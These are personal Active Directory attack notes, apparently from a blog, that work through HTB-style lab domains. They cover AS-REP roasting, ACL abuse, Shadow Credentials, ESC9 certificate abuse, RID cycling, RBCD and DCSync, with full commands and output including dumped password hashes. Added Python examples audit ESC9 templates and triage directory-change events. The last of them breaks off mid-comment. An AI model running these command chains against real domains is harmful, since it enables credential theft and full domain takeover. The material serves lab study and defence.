AD Attack Notes

Fairly messy; I wrote things down in whatever order they came to mind.

Whatever you are doing, syncing your clock with the domain controller is never wrong.

AS-REP Roasting attack

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 10.129.231.186 certified.htb/
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User judith.mader doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User management_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ca_operator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alexander.huges doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User harry.wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gregory.cameron doesn't have UF_DONT_REQUIRE_PREAUTH set

Collecting domain information with bloodhound-python

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodhound-python -c All -u judith.mader -p judith09 -ns 10.129.231.186 -d certified.htb -dc dc01.certified.htb --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 23S
INFO: Compressing output into 20260218072121_bloodhound.zip

A member has WriteOwner over a group

First change the owner so that the group belongs to you.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 set owner MANAGEMENT 'judith.mader'
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on MANAGEMENT

Then grant yourself full control.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 add genericAll MANAGEMENT 'judith.mader'
[+] judith.mader has now GenericAll on MANAGEMENT

Add yourself to the group.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 add groupMember MANAGEMENT 'judith.mader'
[+] judith.mader added to MANAGEMENT

A member (or group) has GenericWrite over a group (or member)

Change the member's password.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'judith.mader' -p 'judith09' --host 10.129.231.186 set password MANAGEMENT_SVC 'Pwned12345!'

This sometimes fails, though.

Targeted AS-REP Roasting

GenericWrite over the domain controller (??? is this really possible in a real engagement)

Go for RBCD.

Shadow Credentials attack

After obtaining a high-privileged user, add a Shadow Credential (the msDS-KeyCredentialLink attribute) to the target user, use the relevant tooling to obtain a .pfx private-key certificate file, then use that .pfx to request a TGT for the target user and from it recover the user's NTLM hash.

Before using Shadow Credentials, remember to sync your clock with the domain controller first.

┌──(root㉿kaada)-[/opt/get_dc_time]
└─# python3 get_dc_time.py -s 10.129.231.186
2026-02-19 03:49:36.000000
Local time set to: 2026-02-19 03:49:36

Using pywhisker

┌──(root㉿kaada)-[/opt/pywhisker-1.0.0/pywhisker]
└─# python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add" --dc-ip 10.129.231.186 --use-ldaps
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 7ba66598-d473-200b-e335-73693201fe6a
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: oigNgAOY.pfx
[*] Must be used with password: F7ddKVbzqkaPtLgqVxFX
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Using certipy

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad shadow auto -u 'judith.mader@certified.htb' -p 'judith09' -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '91c77677-13a9-3225-4533-8a5ec50d7c90'
[*] Adding Key Credential with device ID '91c77677-13a9-3225-4533-8a5ec50d7c90' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '91c77677-13a9-3225-4533-8a5ec50d7c90' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

A member (or group) has GenericAll over a group (or member)

Same as GenericWrite: try changing the password. (Here the change is made while authenticating with a hash; with a password it works the same way.)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# bloodyAD -d certified.htb -u 'management_svc' -p 'aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584' --host 10.129.231.186 set password CA_OPERATOR 'Pwned_CA_123!@#'
[+] Password changed successfully!

No Security Extension - ESC9

Use Certipy to find the domain's certificate information.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad find -u judith.mader@certified.htb -p judith09 -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260219041503_Certipy.txt'
[*] Wrote text output to '20260219041503_Certipy.txt'
[*] Saving JSON output to '20260219041503_Certipy.json'
[*] Wrote JSON output to '20260219041503_Certipy.json'

If NoSecurityExtension is present, ESC9 can be used for the attack.

Find the vulnerable certificate template.

Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

The core of this vulnerability is that a user with enrollment rights on the certificate template (here ca_operator) can request a certificate, and because the template is misconfigured (it lacks the necessary security extension, e.g. CT_FLAG_NO_SECURITY_EXTENSION not being set), an attacker can impersonate another user, such as a domain administrator, by specifying an alternative subject name (SAN) in the certificate request.
————————————————
Copyright notice: the paragraph above is an original article by CSDN blogger 「人衣aoa」, licensed under CC 4.0 BY-SA; reproduction must include the original link and this notice.
Original link: https://blog.csdn.net/qq_45203884/article/details/148122349
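From a defender's side, the listing above is what to scan for: the ESC9 precondition is the NoSecurityExtension enrollment flag on an enabled client-authentication template combined with an enrollment right held by a low-privileged principal. The Python below is an added example (not part of the original post and not Certipy's own code) that parses Certipy's find text output and reports templates meeting those conditions; the embedded input is a constructed, trimmed copy of the listing above with one extra clean template, and the set of privileged groups is an assumption.

```python
"""Audit Certipy `find` text output for ESC9 preconditions (added example, not Certipy's code)."""
import re

# Constructed sample: a trimmed copy of the template listing above plus one template without the
# flag. The parser only relies on the "Key : Value" shape and colon-free continuation lines.
SAMPLE_FIND_OUTPUT = """\
Certificate Templates
  0
    Template Name             : CertifiedAuthentication
    Enabled                   : True
    Client Authentication     : True
    Certificate Name Flag     : SubjectAltRequireUpn
                                SubjectRequireDirectoryPath
    Enrollment Flag           : PublishToDs
                                AutoEnrollment
                                NoSecurityExtension
    Extended Key Usage        : Server Authentication
                                Client Authentication
    Enrollment Rights         : CERTIFIED.HTB\\operator ca
                                CERTIFIED.HTB\\Domain Admins
  1
    Template Name             : User
    Enabled                   : True
    Client Authentication     : True
    Enrollment Flag           : PublishToDs
                                AutoEnrollment
    Enrollment Rights         : CERTIFIED.HTB\\Domain Users
"""

# Assumption: principals expected to hold enrollment rights; any other enroller is low-privileged.
PRIVILEGED = {"domain admins", "enterprise admins", "administrators", "administrator"}
FIELD = re.compile(r"^\s*(?P<key>[A-Za-z][A-Za-z ]*?)\s*:\s*(?P<val>.*)$")


def parse_templates(text):
    """Turn the 'Certificate Templates' section into [{field: [value, ...]}, ...]."""
    templates = []
    current, last_key, in_section = None, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Certificate Templates":
            in_section = True
            continue
        if not in_section or not line:
            continue
        if line.isdigit():  # Certipy prints each template's index on its own line
            current, last_key = {}, None
            templates.append(current)
            continue
        m = FIELD.match(raw)
        if m and current is not None:
            last_key = m.group("key").strip()
            current[last_key] = [m.group("val").strip()]
        elif current is not None and last_key:
            current[last_key].append(line)  # continuation line of a multi-valued field
    return templates


def esc9_findings(templates):
    """ESC9 needs an enabled client-auth template with NoSecurityExtension set and an enrollment
    right held outside the admin groups: such certificates carry no SID extension, so the KDC
    maps them by UPN alone unless StrongCertificateBindingEnforcement=2 (KB5014754) is in force."""
    findings = []
    for t in templates:
        enabled = t.get("Enabled", ["False"])[0] == "True"
        client_auth = t.get("Client Authentication", ["False"])[0] == "True"
        no_sec_ext = "NoSecurityExtension" in t.get("Enrollment Flag", [])
        low_priv = [p for p in t.get("Enrollment Rights", [])
                    if p.split("\\")[-1].lower() not in PRIVILEGED]
        if enabled and client_auth and no_sec_ext and low_priv:
            findings.append({"template": t["Template Name"][0], "enrollable_by": low_priv,
                             "name_flags": t.get("Certificate Name Flag", [])})
    return findings


if __name__ == "__main__":
    for f in esc9_findings(parse_templates(SAMPLE_FIND_OUTPUT)):
        print(f"[ESC9] {f['template']} enrollable by {f['enrollable_by']}; fix: clear NoSecurityExtension")
```

Feed it the text file Certipy writes (the 20260219041503_Certipy.txt above) instead of the sample to audit a real CA; the remediation is to clear the flag on the template and run the KDC in full enforcement.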

Using Certipy, authenticate with the NT hash (a091c1832bcdd4677c28b5a6a1295584) and update the ca_operator account, changing its userPrincipalName (UPN) to Administrator.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'

A certificate representing Administrator was obtained.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad req -u ca_operator@certified.htb -p 'Pwned_CA_123!@#' -ca certified-DC01-CA -template CertifiedAuthentication -debug
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[+] DC host (-dc-host) not specified. Using domain as DC host
[+] Nameserver: None
[+] DC IP: None
[+] DC Host: 'CERTIFIED.HTB'
[+] Target IP: None
[+] Remote Name: 'CERTIFIED.HTB'
[+] Domain: 'CERTIFIED.HTB'
[+] Username: 'CA_OPERATOR'
[+] Trying to resolve 'CERTIFIED.HTB' at '192.168.21.2'
[+] Resolved 'CERTIFIED.HTB' from cache: 10.129.231.186
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.231.186[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.231.186[\pipe\cert]
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Restore ca_operator's original UPN.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad account -username management_svc@certified -hashes :a091c1832bcdd4677c28b5a6a1295584 -dc-ip '10.129.231.186' -upn 'ca_operator@certified.htb' -user 'ca_operator' update

Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'

Using Certipy, authenticate via Kerberos as administrator@certified.htb with the administrator.pfx certificate file, and successfully obtain a TGT and the NT hash.

Remember to align your clock with the domain controller first (Kerberos's five-minute rule).

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sudo ntpdate 10.129.231.186
2026-02-18 15:30:20.560486 (-0500) -46560.448366 +/- 0.045121 10.129.231.186 s1 no-leap
CLOCK: time stepped by -46560.448366

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# certipy-ad -debug auth -pfx administrator.pfx -username administrator -domain certified.htb -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '10.129.231.186'
[+] DC IP: '10.129.231.186'
[+] DC Host: ''
[+] Target IP: '10.129.231.186'
[+] Remote Name: '10.129.231.186'
[+] Domain: ''
[+] Username: 'ADMINISTRATOR'
[*] Certificate identities:
[*] SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[+] Sending AS-REQ to KDC certified.htb (10.129.231.186)
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[+] Attempting to write data to 'administrator.ccache'
[+] Data written to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

Enumerating domain users with lookupsid

Anonymous LookupSID enumeration, also commonly called RID cycling, is a classic and highly effective information-gathering technique in Active Directory penetration tests and CTF boxes.

The core idea: without any valid domain credentials (no username or password at all), the attacker establishes an anonymous connection (a null session) and uses the Windows RPC (Remote Procedure Call) interface to brute-force and resolve every user and group name in the domain.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-lookupsid anonymous@192.168.21.130
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Brute forcing SIDs at 192.168.21.130
[*] StringBinding ncacn_np:192.168.21.130[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3649830887-1815587496-1699028491
498: NOVICE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: NOVICE\Administrator (SidTypeUser)
501: NOVICE\Guest (SidTypeUser)
502: NOVICE\krbtgt (SidTypeUser)
512: NOVICE\Domain Admins (SidTypeGroup)
513: NOVICE\Domain Users (SidTypeGroup)
514: NOVICE\Domain Guests (SidTypeGroup)
515: NOVICE\Domain Computers (SidTypeGroup)
516: NOVICE\Domain Controllers (SidTypeGroup)
517: NOVICE\Cert Publishers (SidTypeAlias)
518: NOVICE\Schema Admins (SidTypeGroup)
519: NOVICE\Enterprise Admins (SidTypeGroup)
520: NOVICE\Group Policy Creator Owners (SidTypeGroup)
521: NOVICE\Read-only Domain Controllers (SidTypeGroup)
522: NOVICE\Cloneable Domain Controllers (SidTypeGroup)
525: NOVICE\Protected Users (SidTypeGroup)
526: NOVICE\Key Admins (SidTypeGroup)
527: NOVICE\Enterprise Key Admins (SidTypeGroup)
553: NOVICE\RAS and IAS Servers (SidTypeAlias)
571: NOVICE\Allowed RODC Password Replication Group (SidTypeAlias)
572: NOVICE\Denied RODC Password Replication Group (SidTypeAlias)
1000: NOVICE\DC$ (SidTypeUser)
1101: NOVICE\DnsAdmins (SidTypeAlias)
1102: NOVICE\DnsUpdateProxy (SidTypeGroup)
1104: NOVICE\MrRobot (SidTypeUser)

RBCD (Resource-Based Constrained Delegation)

Step 1: create a machine account

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-addcomputer novice.com/MrRobot:mrroboto12 -dc-ip 192.168.21.130 -computer-name 'EVILPC$' -computer-pass 'EvilPass123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Successfully added machine account EVILPC$ with password EvilPass123!.

Step 2: carry out the abuse (write the delegation attribute)

We set the domain controller's msDS-AllowedToActOnBehalfOfOtherIdentity attribute to the EVILPC$ account just created.

"Forcing the DC to acknowledge: EVILPC$ is entitled to access me on behalf of anyone."

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-rbcd -delegate-to 'DC$' -delegate-from 'EVILPC$' -dc-ip 192.168.21.130 -action 'write' 'novice.com/MrRobot:mrroboto12'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EVILPC$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EVILPC$ (S-1-5-21-3649830887-1815587496-1699028491-2101)

Step 3: forge a high-privilege ticket (S4U2Self & S4U2Proxy)

Using EVILPC$'s credentials, request from the DC a service ticket (Service Ticket) whose identity is forged as Administrator (or any other high-privilege domain admin).

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-getST -spn 'cifs/DC.novice.com' -impersonate Administrator -dc-ip 192.168.21.130 'novice.com/EVILPC$:EvilPass123!'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.novice.com@NOVICE.COM.ccache

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ls
20260219050404_bloodhound.zip FScan_2.0.1_linux_x32 nc.exe rustscan sucrack
Administrator@cifs_DC.novice.com@NOVICE.COM.ccache

Step 4: import the ticket and DCSync

Point an environment variable at the ticket just generated so that subsequent Impacket tools automatically use it for Kerberos authentication (do not use a password).

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# export KRB5CCNAME=Administrator@cifs_DC.novice.com@NOVICE.COM.ccache

Run the DCSync attack to dump all hashes.

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -k -no-pass DC.novice.com
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x9aec2145c768b9975d683cbd0b2138e0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
NOVICE\DC$:plain_password_hex:6454fcd3651871f06169975c90882651d512f6bd88eb6513625ba8d99345d3de876754b3e3f9bf58cfc3add6cb05f8bea733d5f0df9f622ab68b3daacf1d255bc441b453050330aab4c548c86c0f9a3c5f537964ae483ac161bbe74145a1dffb6a1859df45b64b02c01bdae24fcb58be1ea2ded8eee4bf0014ee73f5fcd8c3faa0bcc080b4f5233286f4fce1cfffe878b5ee4f79f9215cdf59d0151a0e516894562914031807df1bfd9b9f3df285e3f7b570ecc67d187bc0d982b17ddd307a4288a74854c9916887abd47a42ba7c70b6aa0cde01f8dc240dd556b1f2e5e083ff85022153174300275556b609ee322a19
NOVICE\DC$:aad3b435b51404eeaad3b435b51404ee:59895085a4120299fc9fb7158c5b310d:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdead8f737ed36bb82d5a6f44687f0d926e30b276
dpapi_userkey:0xddbacb41fc6cd581597fa5ab3862023b5109d8b5
[*] NL$KM
0000 48 E8 ED C0 9F C8 D4 BE 37 81 D7 2B D4 B1 87 C1 H.......7..+....
0010 3C A7 DA 68 3B CF 48 DF 9C 24 64 88 D4 83 8B F0 <..h;.H..$d.....
0020 CE CA F8 FB 07 C8 07 0A 4A 5A F6 AD 11 DB 87 28 ........JZ.....(
0030 B8 DD 0C E7 35 0E 1D 37 18 AA CA BD D6 C7 90 26 ....5..7.......&
NL$KM:48e8edc09fc8d4be3781d72bd4b187c13ca7da683bcf48df9c246488d4838bf0cecaf8fb07c8070a4a5af6ad11db8728b8dd0ce7350e1d3718aacabdd6c79026
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:34d77123d1c64e2da30028f21bbb91d0:::
MrRobot:1104:aad3b435b51404eeaad3b435b51404ee:c8fa8686516464c51cfc0bdc3e52ef9e:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:59895085a4120299fc9fb7158c5b310d:::
EVILPC$:2101:aad3b435b51404eeaad3b435b51404ee:2ce986df7478744a81b7d00446da7417:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0218bc05d978eff9d49b5578b0b82d2b6f6fd19b47b55f91c07a555dac208574
Administrator:aes128-cts-hmac-sha1-96:4f3a074e29171c06ab3db041c1be2128
Administrator:des-cbc-md5:34701ccb6efb9704
krbtgt:aes256-cts-hmac-sha1-96:1767397277e40d45c7924647e4b2ce3b211a87bbe5aa345beba0cb95886d696f
krbtgt:aes128-cts-hmac-sha1-96:ab93922b57ce1a5ab5e6e8f4ea078f4e
krbtgt:des-cbc-md5:58a104e55ec89eb9
MrRobot:aes256-cts-hmac-sha1-96:7cd49c483c6f0e1977b9d0939c84f72d017724c26bb54d742309e70f0872a1d5
MrRobot:aes128-cts-hmac-sha1-96:67d90694c72b439b2921976fb1f775cf
MrRobot:des-cbc-md5:62b39b86f862d3fd
DC$:aes256-cts-hmac-sha1-96:c8f24757655c70f50c7ec4fdaa365848392a2a969b4da2c0e3fc4580290bd234
DC$:aes128-cts-hmac-sha1-96:f273380db059a96f5f66ea2cfdce97b0
DC$:des-cbc-md5:34ae2a0d1cd9ecdc
EVILPC$:aes256-cts-hmac-sha1-96:12bf6710bb192fe177171749e5a228cb0940b783561f2a88558e5adbe0b25b1a
EVILPC$:aes128-cts-hmac-sha1-96:1fc6a16715a142b4fb8a38b230bcf6d5
EVILPC$:des-cbc-md5:57ec67611675d089
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f06f7e08900>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f06f7e08900>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 172, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 169, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 409, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 633, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1357, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 474, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 443, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 150, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 192.168.21.130 -u administrator -H bbabdc192282668fe5190ab0c5150b34
SMB 192.168.21.130 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:novice.com) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.21.130 445 DC [+] novice.com\administrator:bbabdc192282668fe5190ab0c5150b34 (Pwn3d!)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-wmiexec -k -no-pass DC.novice.com
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
novice\administrator
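Both the Shadow Credentials step earlier (a write to msDS-KeyCredentialLink) and Step 2 of the RBCD chain above (a write to msDS-AllowedToActOnBehalfOfOtherIdentity on the DC) are single LDAP attribute modifications, which Directory Service Changes auditing records as Event ID 5136. The Python below is an added example (not from the original post) that triages constructed 5136-style records for exactly those writes; the field names follow the 5136 EventData layout, while the sample records and the allowlist of expected administrators are assumptions.

```python
"""Triage Event ID 5136 records for the attribute writes behind RBCD and Shadow Credentials."""

# Writes to these attributes enable the two techniques shown on this page.
SENSITIVE_ATTRS = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity":
        "RBCD: a principal was allowed to impersonate users to this object (S4U2Proxy)",
    "msDS-KeyCredentialLink":
        "Shadow Credentials: a key credential usable for PKINIT was linked to this account",
}
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"  # 5136 OperationType codes
# Assumption (constructed): accounts expected to manage these attributes in this environment.
ALLOWLIST = {"novice\\administrator", "certified\\administrator"}

# Constructed records in the shape of the 5136 EventData fields. 5136 is only logged when the
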